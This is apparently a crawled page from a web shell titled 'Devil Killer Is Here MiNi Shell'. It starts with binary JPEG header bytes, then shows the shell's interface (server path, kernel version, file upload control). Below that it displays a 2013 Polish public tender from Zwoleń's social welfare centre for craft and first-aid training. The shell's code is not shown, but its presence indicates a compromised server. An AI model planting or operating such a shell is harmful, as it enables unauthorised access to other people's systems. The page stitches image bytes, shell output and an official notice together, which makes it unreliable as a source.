JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20131002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20131002/201845-N-2013.html

<p class="kh_header"><b>Zwoleń: Usługi szkoleniowe  dla uczestników projektu systemowego Uwierz w swoje możliwości realizowanego przez  Miejski Ośrodek Pomocy Społecznej w Zwoleniu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach  Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej</b><br>
<b>Numer ogłoszenia: 201845 - 2013; data zamieszczenia: 02.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Lubelska 6, 26-700 Zwoleń, woj. mazowieckie, tel. 48 676 23 30, faks 48 676 23 30.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe  dla uczestników projektu systemowego Uwierz w swoje możliwości realizowanego przez  Miejski Ośrodek Pomocy Społecznej w Zwoleniu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach  Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zorganizowanie i  przeprowadzenie szkolenia w formie warsztatowej  z zakresu rękodzieła artystycznego - wytwarzanie sztucznej biżuterii i małych form ozdobnych oraz  kursu pierwszej pomocy przedmedycznej dla 15 kobiet  uczestniczek  projektu systemowego pn. Uwierz w swoje możliwości realizowanego przez  Miejski Ośrodek Pomocy Społecznej w Zwoleniu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach  Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej
2.Celem  przeprowadzenia niniejszej  usługi    jest uzyskanie bądź rozszerzenie kompetencji uczestników w celu zwiększenia ich mobilności zawodowej poprzez zdobycie odpowiednich wiadomości oraz umiejętności praktycznych, niezbędnych w pracy a Wykonawca zobowiązuje się do przeprowadzenia  jej  zgodnie z obowiązującymi  w tym  zakresie przepisami prawa.
3.Szczegółowy opis przedmiotu zamówienia dla szkolenie z zakresu rękodzieła artystycznego - wytwarzanie sztucznej biżuterii i małych form ozdobnych, którego, celem jest zapoznanie uczestniczek z formą wytwarzania biżuterii, którą mogą wykonywać samodzielnie, co da im możliwość nabycia nowych umiejętności manualnych, rozwinięcia kreatywności a także możliwość artystycznego wyrażania siebie, a  w połączeniu z umiejętnościami nabytymi na  zajęciach - Trening kompetencji życiowych z nawiązaniem do przedsiębiorczości i małego marketingu pokaże im jak sprzedawać własny wyrób, co może przyczynić się do podjęcia własnej działalności, a minimalny program  powinien obejmować co najmniej następujące zagadnienia:
a) wprowadzenie w zagadnienia wytwarzania sztucznej biżuterii;
b) organizacja warsztatu pracy i poszukiwania motywów;
c) klasyfikacja i omówienie tworzyw do wykonywania biżuterii;
d) akcesoria niezbędne do wykonywania ozdób;
e)elementy montażowe do wykonywania biżuterii;
f) ćwiczenia wykonywania biżuterii z metaloplastyki ( broszki, kolczyki, naszyjniki, bransolety)
g) ćwiczenia wykonywania eko-biżuterii ( drewno, sznurek, skóra ekologiczna)
h) ćwiczenia wykonywania biżuterii z zastosowaniem filcu.
4.Zamawiający podał minimalny zakres programowy wskazując tym samym na zagadnienia, które muszą zostać podjęte podczas przeprowadzenia skolenia, Wykonawca może przedstawić  autorski program szkolenia, zawierający niezbędne minimum, rozszerzając dowolnie zakres poszczególnych zagadnień oraz dodając własne moduły tematyczne
5.Usługą obejmuje  się 15 kobiet  zakwalifikowanych przez Zamawiającego, a imienny wykaz osób zostanie przekazany Wykonawcy najpóźniej dzień przed rozpoczęciem szkolenia.  Zamawiający zastrzega   sobie możliwość zmniejszenia ilości uczestników, w związku z powyższym  nie poniesie zobowiązania a kwota należna Wykonawcy będzie iloczynem liczby osób i kosztu  jednej osoby.
6.Szkolenie obejmuje łącznie  50 godzin dydaktycznych zajęć grupowych  w tym:   
- 8 godzin dydaktycznych zajęć teoretycznych
- 42 godziny dydaktyczne zajęć praktycznych
7.Wykonawca zobowiązany będzie wydać w pierwszym dniu szkolenia jego uczestnikom  materiały biurowe w postaci  notatnika o formacie A4 60 kartkowego, długopisu, teczki tekturowej, podręcznika lub skryptu trwale zbindowanego zawierającego opracowania tematyczne wynikające bezpośrednio z programu nauczania  oraz harmonogram szkolenia, które należy uwzględnić w cenie oferty. Materiały te  muszą być nowe, nieużywane, czytelne, oznaczone logotypami projektu zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL a  jeden komplet tak przygotowanych materiałów Wykonawca przekaże Zamawiającemu, najpóźniej w dniu rozpoczęcia szkolenia.
8.Ponadto Wykonawca zapewni odpowiednią ilość sprzętu, narzędzi, urządzeń i pomocy dydaktycznych właściwych do wykorzystania w trakcie prowadzenia zajęć. ( imadełka, kowadełka, szlifierki wielofunkcyjne, palniki gazowe, lupy, pistolet elektryczny do kleju) ponadto każdy uczestnik musi być wyposażony w zestaw  narzędzi; szczypce płaskie i okrągłe, przecinak, pilniki do metali-płaski, półokrągły, trójkątny, kwadratowy i okrągły, młotki 30 i 60 gr., nożyce do blachy, szczypce do profilowania zaokrągleń, zestaw peset, igły do nawlekania, szydełka, które po zakończeniu szkolenia przechodzą na własność uczestników. Wykonawca zapewni również  półfabrykaty oraz konieczne materiały i narzędzia do wytwarzania biżuterii. Wytworzona przez uczestników szkolenia biżuteria w trakcie wykonywania zajęć przechodzi na ich własność
9.Szczegółowy opis przedmiotu zamówienia dla  kursu z zakresu  pierwszej  pomocy przedmedycznej ,   którego celem    jest nabycie elementarnej wiedzy oraz umiejętności prawidłowego postępowania i zachowania się podczas sytuacji zagrażającej bezpieczeństwu i życiu, nauczenie się właściwej i sprawnej reakcji w stanach zagrożenia  życia oraz umiejętność opanowania uczucia strachu podczas udzielania pierwszej pomocy. Kurs ma również na celu przygotowania uczestników do prowadzenia podstawowych zabiegów resuscytacyjnych
10.Program kursu powinien zawierać następującą tematykę:
a) wykład z podstawowych zabiegach resuscytacyjnych w tym: aspekty prawne udzielania pierwszej pomocy, standaryzacja działań ratowniczych, etapy udzielania pierwszej pomocy, pozycja bezpieczna;
 b) ćwiczenia związane z podstawowymi zabiegami resuscytacyjnymi w tym: ocena bezpieczeństwa ocena poszkodowanego, wezwanie pomocy, wykonanie pełnej resuscytacji krążeniowo-oddechowej; 
c) wykłady i ćwiczenia dotyczące stanów zagrożenia życia: zadławienia, omdlenia, epilepsja ,zawał serca,wstrząs, zatrucia, oparzenia i odmrożenia, udar mózgu, złamania, krwotoki, skręcenia, porażenia prądem i piorunem, wypadek komunikacyjny- zachowanie w miejscu zdarzenia  oraz  umiejętność postępowania w stanach zagrożenia życia w tym: udrożnienie dróg  oddechowych, ciało obce w             drogach oddechowych u osoby dorosłej, dziecka, niemowlęcia;
11.Zamawiający podał minimalny zakres programowy wskazując tym samym na zagadnienia, które muszą zostać podjęte podczas realizacji kursu, Wykonawca może przedstawić autorski program szkolenia, zawierający niezbędne minimum, rozszerzając dowolnie zakres poszczególnych zagadnień oraz dodając własne moduły tematyczne
12.Zamówieniem zostaje objęte  15 kobiet, z podziałem na dwie grupy po  8 godzin dydaktycznych dla każdej grupy, przy czym Zamawiający zastrzega sobie możliwość zmniejszenia ilości uczestników,   w związku z powyższym  nie poniesie żadnego zobowiązania a kwota należna Wykonawcy będzie iloczynem liczby osób i kosztu  jednej osoby. Zamawiający przekaże Wykonawcy najpóźniej dzień przed rozpoczęciem szkolenia imienny wykaz osób objętych zamówieniem.
13.Wykonawca wyposaży uczestników w materiały biurowe: notatnik A4, długopis, teczkę tekturową ,  podręcznik lub trwale zbindowany skrypt zawierający opracowanie tematyczne wynikające bezpośrednio z programu nauczania, zapewni w całości niezbędny do przeprowadzenia kursu sprzęt dydaktyczny ( typu rzutnik, ekran, tablica flipchart, flamastry itp.) oraz do zajęć praktycznych koniecznych w celu realizowania programu kursu ( typu maty, fantomy do nauki podstawowych zabiegów resuscytacyjnych (dorosły, dziecko), materiały do utrzymania higieny, materiały opatrunkowe, rękawice, listwy różnej długości, szyny Kramera, deska unieruchamiająca , kołnierze szyjne itp.)
14.Zajęcia teoretyczne  i praktyczne Zamawiający wymaga aby odbywały się na terenie miasta Zwolenia, w lokalu, wyposażonym w salę szkoleniową spełniającą wymogi bhp i p.poż dostosowaną do ilości grupy wyposażoną w odpowiednią ilość stanowisk do zajęć praktycznych (  dla szkolenia z zakresu rękodzieła artystycznego 1 stanowisko dla max. 2 osób) oraz posiadającym zaplecze sanitarne (WC, umywalka, środki higieny)  sala powinna być odpowiednio oświetlona, wentylowana, wyposażona w sprzęt dydaktyczny tj: tablicę do pisania lub flipchart, rzutnik multimedialny, oznaczona przez Wykonawcę logotypami POKL i EFS wraz z informacją o współfinansowaniu projektu. a Wykonawca dokładny adres miejsca realizacji zamówienia wskaże Zamawiającemu najpóźniej  na 3 dni  przed podpisaniem umowy.
15.Zajęcia realizowane  będą  w dni robocze od poniedziałku do piątku, w godzinach od 08:00 do 16:00. Dopuszcza się możliwość, jeżeli zajdzie taka konieczność, aby zajęcia odbywały się w godzinach późniejszych lub w sobotę, jednak po wcześniejszym uzgodnieniu z osobą odpowiedzialną za realizację projektu ze strony Zamawiającego i z uczestnikami projektu.
16.Zamawiający nie dopuszcza udziału innych osób w szkoleniu lub łączenia więcej grup o tej tematyce szkolenia;
17.Wykonawca zobowiązany będzie wydać w pierwszym dniu szkolenia jego uczestnikom zestawy materiałów dydaktycznych i biurowych tj:  notatnika o formacie A4    60 kartkowego, długopisu, teczki tekturowej  oraz harmonogram szkolenia, które należy uwzględnić w kalkulacji kosztów szkolenia. Materiały te  muszą być nowe, nieużywane, czytelne, oznaczone logotypami projektu zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL., a  jeden komplet tak przygotowanych materiałów przekaże Zamawiającemu, najpóźniej w dniu rozpoczęcia szkolenia.
18.Otrzymanie  materiałów biurowych i narzędzi zostanie potwierdzone pisemnie przez każdego uczestnika a lista przekazana Zamawiającemu  po zakończeniu szkolenia.
19.W trakcie prowadzenia zajęć dla obydwu szkoleń Wykonawca  zapewni uczestnikom stały i nieograniczony dostęp do ciepłych napoi, każdego dnia szkolenia tj: kawę, herbatę, śmietankę do kawy, cukier, ciastka, dodatkowo wodę mineralną gazowaną i niegazowaną oraz ciepły posiłek, (II danie z napojem)  którego stawka żywieniowa wyniesie od 15,00 do 20,00 zł. na każdego uczestnika szkolenia dziennie. Dodatkowo Wykonawca zapewni  uczestnikom, talerzyki, kubeczki, łyżeczki oraz serwetki
20.Uczestnicy zajęć mają każdorazowo potwierdzić odbiór posiłku na odpowiedniej imiennej liście, prowadzonej przez Wykonawcę, systematycznie przez cały czas trwania zajęć.
21.Wykonawca zobowiązany będzie do ubezpieczenia uczestników szkolenia wskazanych przez Zamawiającego  od następstw nieszczęśliwych wypadków na cały okres trwania usługi, Wykonawca doręczy Zamawiającemu w dniu rozpoczęcia szkolenia kopię polisy ubezpieczeniowej potwierdzonej za zgodność z oryginałem.
22.Wykonawca będzie zobowiązany również do sporządzenia protokołów okoliczności i przyczyn wypadku przez zespół powypadkowy w razie gdyby taki wypadek zaistniał w trakcie szkolenia u osoby skierowanej, lub w trakcie przejazdu tych osób.
23.Po zakończeniu szkolenia Wykonawca  wypłaci   uczestnikom dojeżdżającym  z poza terenu Zwolenia  koszty dojazdu w wysokości 10,00 zł za każdy dzień obecności na zajęciach. Na etapie  sporządzania oferty należy przyjąć założenie( po 6 osób dla obydwu szkoleń) przy czym liczba ta może ulec zmianie,  koszty dojazdu  należy wliczyć w cenę oferty a listę potwierdzającą odbiór  przekazać Zamawiającemu po zakończeniu zajęć.
24.Wykonawca zapewni potencjał kadrowy w tym:  opiekuna z ramienia  instytucji szkoleniowej odpowiedzialną za organizację szkolenia wskazaną do kontaktu z uczestnikami szkolenia oraz z Zamawiającym, trenerów o odpowiednich  kwalifikacjach, doświadczeniu i znajomość tematyki programu szkolenia;
25.Wykonawca zobowiązany będzie  przeprowadzić wśród uczestników szkolenia anonimowych ankiet służących do zdiagnozowania poziomu szkolenia i przestawienia jej wyników Zamawiającemu.
26.Wykonawca realizujący przedmiot zamówienia  będzie zobowiązany prowadzić dokumentację szkolenia: dziennika zajęć edukacyjnych, zawierającego listę obecności, wymiar godzin i tematy zajęć, przygotować oświadczenia, na których uczestnicy  potwierdzą odbiór materiałów dydaktycznych i biurowych i  ciepłych posiłków, sporządzić imienną listę, na której uczestnicy szkolenia potwierdzą  zwrot  kosztów przejazdu, sporządzić rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia przez jego uczestników, prowadzić inną dokumentację niezbędną do rozliczenia projektu;
27.Wykonawca pod rygorem utraty prawa do zapłaty za wykonany przedmiot zamówienia, zobowiązany będzie do niezwłocznego informowania Zamawiającego o:
1)nie zgłoszeniu się uczestników na zajęcia;
2)przerwaniu szkolenia lub rezygnacji  oraz każdorazowej nieobecności skierowanych osób;
3)innych sytuacjach, które mają wpływ na realizację programu szkolenia i umowy;
28.Wykonawca zobowiązany będzie do przekazania Zamawiającemu w terminie 7 dni  kalendarzowych od dnia zakończenia szkolenia, następujących dokumentów:
1)oryginału ankiet oceniających przeprowadzonych wśród uczestników szkolenia;
2)oryginału imiennego wykazu osób, które ukończyły szkolenie;
3)oryginału imiennego osób które nie ukończyły szkolenia;
4)rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji poświadczonych za zgodność z oryginałem;
5)kserokopii dziennika zajęć poświadczonych za zgodność z oryginałem;
6)oryginału list obecności ;
7)kserokopii wydanych uczestnikom zajęć zaświadczeń potwierdzających ukończenie szkolenia, poświadczonych za zgodność z oryginałem;
8)oryginału oświadczeń uczestników potwierdzających odbiór materiałów, dydaktycznych i biurowych oraz ciepłych posiłków;
9)oryginału imiennej listy, na której uczestnicy potwierdzą otrzymanie zwrotu kosztów przejazdu;
10)innej dokumentacji niezbędnej do rozliczenia szkolenia.  
29. Zamawiający zastrzega sobie prawo kontroli przebiegu szkolenia przez upoważnionych pracowników ze strony Zamawiającego oraz inne upoważnione osoby w tym Instytucji Wdrażającej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
W zakresie spełnienia warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, Wykonawca składa oświadczenie o spełnieniu warunku zgodnie z Załącznikiem Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
W zakresie spełnienia warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, Wykonawca składa oświadczenie o spełnieniu warunku zgodnie z Załącznikiem Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
W zakresie spełnienia warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, Wykonawca składa oświadczenie o spełnieniu warunku zgodnie z Załącznikiem Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
W zakresie spełnienia warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, Wykonawca składa oświadczenie o spełnieniu warunku zgodnie z Załącznikiem Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
W zakresie spełnienia warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, Wykonawca składa oświadczenie o spełnieniu warunku zgodnie z Załącznikiem Nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie o podwykonawcach- Załącznik Nr 5 do SIWZ: Wykonawca wykonujący zamówienie wyłącznie siłami własnymi nie ma obowiązku dołączania do oferty tego załącznika..
2.Zaakceptowany przez Wykonawcę projekt umowy - Załącznik Nr 6 do SIWZ; Wykonawca może też zastosować się do informacji zawartej w Rozdziale XVIII pkt 1
3. Wypełniony formularz ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany postanowień niniejszej umowy ,dopuszczalne są w następujących przypadkach:
1)zmiany terminu realizacji umowy z przyczyn leżących po stronie Zamawiającego  ( w szczególności sytuacja ekonomiczna, warunki organizacyjne, czy też z przyczyn technicznych.
2)zmiany terminu realizacji umowy z uzasadnionych przyczyn niezależnych od Wykonawcy uniemożliwiających mu realizację zamówienia w terminie ( wniosek dotyczący tej zmiany musi być odpowiednio udokumentowany) 
3)zmiany obowiązujących przepisów prawa,
4)zaistnienia siły wyższej, (powódź, pożar, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej.
5)zmiany osoby (trenera szkoleniowego), przy pomocy którego Wykonawca realizuje przedmiot umowy na inną o kwalifikacjach i doświadczeniu zawodowym nie mniejszych niż posiadane przez osobę wskazaną. Wykonawca ma obowiązek złożyć wniosek o dokonanie takiej zmiany w formie pisemnej nie później niż 3 dni przed terminem wskazanym przez Zamawiającego jako termin przeprowadzenia szkolenia oraz przedstawić dokumenty potwierdzające kwalifikacje i doświadczenie zawodowe osoby mającej przeprowadzić szkolenie.
6)Przesunięcie terminu szkolenia nie stanowi istotnej zmiany postanowień umowy i nie wymaga aneksu, z zastrzeżeniem, że Wykonawca ma udowodnić tę zmianę z Zamawiającym w formie pisemnej.
